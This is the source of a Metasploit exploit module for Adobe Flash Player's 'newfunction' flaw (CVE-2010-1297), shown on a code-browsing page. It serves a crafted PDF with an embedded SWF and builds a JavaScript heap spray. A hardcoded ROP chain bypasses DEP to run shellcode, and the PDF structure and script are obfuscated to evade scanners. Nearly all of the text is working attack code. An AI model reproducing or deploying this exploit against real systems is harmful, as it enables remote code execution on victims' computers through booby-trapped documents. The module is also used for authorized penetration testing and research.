CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'zlib'67class MetasploitModule < Msf::Exploit::Remote8Rank = NormalRanking910include Msf::Exploit::Remote::HttpServer::HTML1112def initialize(info = {})13super(update_info(info,14'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',15'Description' => %q{16This module exploits a vulnerability in the DoABC tag handling within17versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also18vulnerable, as are any other applications that may embed Flash player.1920Arbitrary code execution is achieved by embedding a specially crafted Flash21movie into a PDF document. An AcroJS heap spray is used in order to ensure22that the memory used by the invalid pointer issue is controlled.2324NOTE: This module uses a similar DEP bypass method to that used within the25adobe_libtiff module. This method is unlikely to work across various26Windows versions due a hardcoded syscall number.27},28'License' => MSF_LICENSE,29'Author' =>30[31'Unknown', # Found being openly exploited32'jduck' # Metasploit version33],34'References' =>35[36['CVE', '2010-1297'],37['OSVDB', '65141'],38['BID', '40586'],39['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],40# For SWF->PDF embedding41['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']42],43'DefaultOptions' =>44{45'EXITFUNC' => 'process',46'HTTP::compression' => 'gzip',47'HTTP::chunked' => true,48'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'49},50'Payload' =>51{52'Space' => 1000,53'BadChars' => "\x00",54'DisableNops' => true55},56'Platform' => 'win',57'Targets' =>58[59# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd60# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd61# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd62[ 'Automatic', { }],63],64'DisclosureDate' => '2010-06-04',65'DefaultTarget' => 0))66end6768def exploit69# load the static swf file70path = File.join( Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf" )71fd = File.open( path, "rb" )72@swf_data = fd.read(fd.stat.size)73fd.close7475super76end7778def on_request_uri(cli, request)7980print_status("Sending crafted PDF w/SWF")8182js_data = make_js(regenerate_payload(cli).encoded)83pdf_data = make_pdf(@swf_data, js_data)84send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })8586# Handle the payload87handler(cli)88end899091def make_js(encoded_payload)9293# The following executes a ret2lib using BIB.dll94# The effect is to bypass DEP and execute the shellcode in an indirect way95stack_data = [960xc0c0c0c,970x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret980xcccccccc,990x70048ef, # xchg eax,esp / ret1000x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]1010xcccccccc,1020x7009084, # ret1030x7009084, # ret1040x7009084, # ret1050x7009084, # ret1060x7009084, # ret1070x7009084, # ret1080x7009033, # ret 0x181090x7009084, # ret1100xc0c0c0c,1110x7009084, # ret1120x7009084, # ret1130x7009084, # ret1140x7009084, # ret1150x7009084, # ret1160x7009084, # ret1170x7009084, # ret1180x7009084, # ret1190x7001599, # pop ebp / ret1200x10124,1210x70072f7, # pop eax / ret1220x10104,1230x70015bb, # pop ecx / ret1240x1000,1250x700154d, # mov [eax], ecx / ret1260x70015bb, # pop ecx / ret1270x7ffe0300, # -- location of KiFastSystemCall1280x7007fb2, # mov eax, [ecx] / ret1290x70015bb, # pop ecx / ret1300x10011,1310x700a8ac, # mov [ecx], eax / xor eax,eax / ret1320x70015bb, # pop ecx / ret1330x10100,1340x700a8ac, # mov [ecx], eax / xor eax,eax / ret1350x70072f7, # pop eax / ret1360x10011,1370x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)1380x7005c54, # pop esi / add esp,0x14 / ret1390xffffffff,1400x10100,1410x0,1420x10104,1430x1000,1440x40,145# The next bit effectively copies data from the interleaved stack to the memory146# pointed to by eax147# The data copied is:148# \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83149# \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff150# \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x901510x700d731, # mov eax, [ebp-0x24] / ret1520x70015bb, # pop ecx / ret1530x9054905a,1540x700154d, # mov [eax], ecx / ret1550x700a722, # add eax, 4 / ret1560x70015bb, # pop ecx / ret1570x5815eb5a,1580x700154d, # mov [eax], ecx / ret1590x700a722, # add eax, 4 / ret1600x70015bb, # pop ecx / ret1610x18891a8b,1620x700154d, # mov [eax], ecx / ret1630x700a722, # add eax, 4 / ret1640x70015bb, # pop ecx / ret1650x8304c083,1660x700154d, # mov [eax], ecx / ret1670x700a722, # add eax, 4 / ret1680x70015bb, # pop ecx / ret1690xfb8104c2,1700x700154d, # mov [eax], ecx / ret1710x700a722, # add eax, 4 / ret1720x70015bb, # pop ecx / ret1730xc0c0c0c,1740x700154d, # mov [eax], ecx / ret1750x700a722, # add eax, 4 / ret1760x70015bb, # pop ecx / ret1770x5ebee75,1780x700154d, # mov [eax], ecx / ret1790x700a722, # add eax, 4 / ret1800x70015bb, # pop ecx / ret1810xffffe6e8,1820x700154d, # mov [eax], ecx / ret1830x700a722, # add eax, 4 / ret1840x70015bb, # pop ecx / ret1850x909090ff,1860x700154d, # mov [eax], ecx / ret1870x700a722, # add eax, 4 / ret1880x70015bb, # pop ecx / ret1890x90909090,1900x700154d, # mov [eax], ecx / ret1910x700a722, # add eax, 4 / ret1920x70015bb, # pop ecx / ret1930x90909090,1940x700154d, # mov [eax], ecx / ret1950x700a722, # add eax, 4 / ret1960x70015bb, # pop ecx / ret1970x90ffffff,1980x700154d, # mov [eax], ecx / ret1990x700d731, # mov eax, [ebp-0x24] / ret2000x700112f # call eax -- (execute stub to transition to full shellcode)201].pack('V*')202203var_unescape = rand_text_alpha(rand(100) + 1)204var_shellcode = rand_text_alpha(rand(100) + 1)205206var_start = rand_text_alpha(rand(100) + 1)207208var_s = 0x10000209var_c = rand_text_alpha(rand(100) + 1)210var_b = rand_text_alpha(rand(100) + 1)211var_d = rand_text_alpha(rand(100) + 1)212var_3 = rand_text_alpha(rand(100) + 1)213var_i = rand_text_alpha(rand(100) + 1)214var_4 = rand_text_alpha(rand(100) + 1)215216payload_buf = ''217payload_buf << stack_data218payload_buf << encoded_payload219220escaped_payload = Rex::Text.to_unescape(payload_buf)221222js = %Q|223var #{var_unescape} = unescape;224var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );225var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );226while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};227#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);228#{var_b} += #{var_shellcode};229#{var_b} += #{var_c};230#{var_d} = #{var_b}.substring(0, #{var_s}/2);231while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};232#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);233var #{var_4} = new Array();234for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";235|236237js238end239240def random_non_ascii_string(count)241result = ""242count.times do243result << (rand(128) + 128).chr244end245result246end247248def io_def(id)249"%d 0 obj\n" % id250end251252def io_ref(id)253"%d 0 R" % id254end255256257#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/258def n_obfu(str)259result = ""260str.scan(/./u) do |c|261if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'262result << "#%x" % c.unpack("C*")[0]263else264result << c265end266end267result268end269270271def ascii_hex_whitespace_encode(str)272result = ""273whitespace = ""274str.each_byte do |b|275result << whitespace << "%02x" % b276whitespace = " " * (rand(3) + 1)277end278result << ">"279end280281282def make_pdf(swf, js)283284swf_name = rand_text_alpha(8 + rand(8)) + ".swf"285286xref = []287eol = "\n"288endobj = "endobj" << eol289290# Randomize PDF version?291pdf = "%PDF-1.5" << eol292#pdf << "%" << random_non_ascii_string(4) << eol293294# catalog295xref << pdf.length296pdf << io_def(1) << n_obfu("<</Type/Catalog")297pdf << n_obfu("/Pages ") << io_ref(3)298pdf << n_obfu("/OpenAction ") << io_ref(5)299pdf << n_obfu(">>")300pdf << eol << endobj301302# pages array303xref << pdf.length304pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj305306# page 1307xref << pdf.length308pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)309pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")310pdf << n_obfu(">>")311pdf << eol << endobj312313# js action314xref << pdf.length315pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj316317# js stream318xref << pdf.length319compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))320pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol321pdf << "stream" << eol322pdf << compressed << eol323pdf << "endstream" << eol324pdf << endobj325326# swf annotation object327xref << pdf.length328pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")329pdf << n_obfu("/Rect [20 20 187 69] ")330pdf << n_obfu("/RichMediaSettings ") << io_ref(8)331pdf << n_obfu("/RichMediaContent ") << io_ref(9)332pdf << n_obfu("/NM (") << swf_name << n_obfu(")")333pdf << n_obfu(">>")334pdf << eol << endobj335336# rich media settings337xref << pdf.length338pdf << io_def(8)339pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")340pdf << n_obfu("/Activation ") << io_ref(10)341pdf << n_obfu("/Deactivation ") << io_ref(11)342pdf << n_obfu(">>")343pdf << eol << endobj344345# rich media content346xref << pdf.length347pdf << io_def(9)348pdf << n_obfu("<</Type/RichMediaContent")349pdf << n_obfu("/Assets ") << io_ref(12)350pdf << n_obfu("/Configurations [") << io_ref(14) << "]"351pdf << n_obfu(">>")352pdf << eol << endobj353354# rich media activation / deactivation355xref << pdf.length356pdf << io_def(10)357pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")358pdf << eol << endobj359360xref << pdf.length361pdf << io_def(11)362pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")363pdf << eol << endobj364365# rich media assets366xref << pdf.length367pdf << io_def(12)368pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")369pdf << eol << endobj370371# swf embeded file ref372xref << pdf.length373pdf << io_def(13)374pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")375pdf << eol << endobj376377# rich media configuration378xref << pdf.length379pdf << io_def(14)380pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")381pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")382pdf << eol << endobj383384# rich media isntance385xref << pdf.length386pdf << io_def(15)387pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")388pdf << n_obfu("/Asset ") << io_ref(13)389pdf << n_obfu(">>")390pdf << eol << endobj391392# swf stream393# NOTE: This data is already compressed, no need to compress it again...394xref << pdf.length395pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol396pdf << "stream" << eol397pdf << swf << eol398pdf << "endstream" << eol399pdf << endobj400401# trailing stuff402xrefPosition = pdf.length403pdf << "xref" << eol404pdf << "0 %d" % (xref.length + 1) << eol405pdf << "0000000000 65535 f" << eol406xref.each do |index|407pdf << "%010d 00000 n" % index << eol408end409410pdf << "trailer" << eol411pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol412413pdf << "startxref" << eol414pdf << xrefPosition.to_s() << eol415416pdf << "%%EOF" << eol417418end419end420421422